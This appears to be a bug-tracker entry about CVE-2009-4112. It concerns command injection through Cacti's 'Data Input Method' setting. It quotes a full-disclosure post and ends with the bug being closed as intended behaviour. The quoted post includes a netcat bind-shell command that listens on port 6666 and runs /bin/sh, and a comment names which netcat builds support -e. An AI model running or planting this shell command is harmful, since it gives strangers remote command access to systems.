Common Vulnerabilities and Exposures assigned an identifier CVE-2009-4112 to the following vulnerability: Cacti 0.8.7e and earlier allows remote authenticated administrators to gain privileges by modifying the "Data Input Method" for the "Linux - Get Memory Usage" setting to contain arbitrary commands. References: ----------- http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-4112 http://archives.neohapsis.com/archives/fulldisclosure/2009-11/0292.html http://www.securityfocus.com/bid/37137 More issue details from the full-disclosure post by Moritz Naumann: ------------------------------------------------------------------- 5. Priviledge escalation Finally, due to the permissive way the web interface allows Cacti to be configured, a cacti administrator is also able to execute arbitrary commands on the system as the user the Cacti polling mechanism runs as (usually a non-priviledged user). For example, it is possible to successfully spawn (and connect to) a backdoor/remote shell on the Cacti system by changing the "Data Input Method" for "Linux - Get Memory Usage". Setting "Input String" to nohup nc -l -p 6666 -n -e /bin/sh & would spawn a remotely accessible shell whenever this handler was called (every couple of minutes by default on my Debian test system). Cacti developers say: > There is no effective way to fix the data input method without > breaking Cacti. It will be reviewed for the release of 0.8.8. Upstream patch: --------------- No upstream patch yet.
what version of nc has a valid -e?
(In reply to comment #1) > what version of nc has a valid -e? Some Debian version, or nmap's netcat implementation - ncat. However, I'm closing this bug. It is expected that cacti administrator is able to define new Data Input Methods that can be either SNMP query or command that is run with privileges of cacti user. So this "flaw" does not bypass any intended restriction. It seems upstream has no intention to add additional restrictions on Data Input Methods commands in the maintenance releases for current cacti version.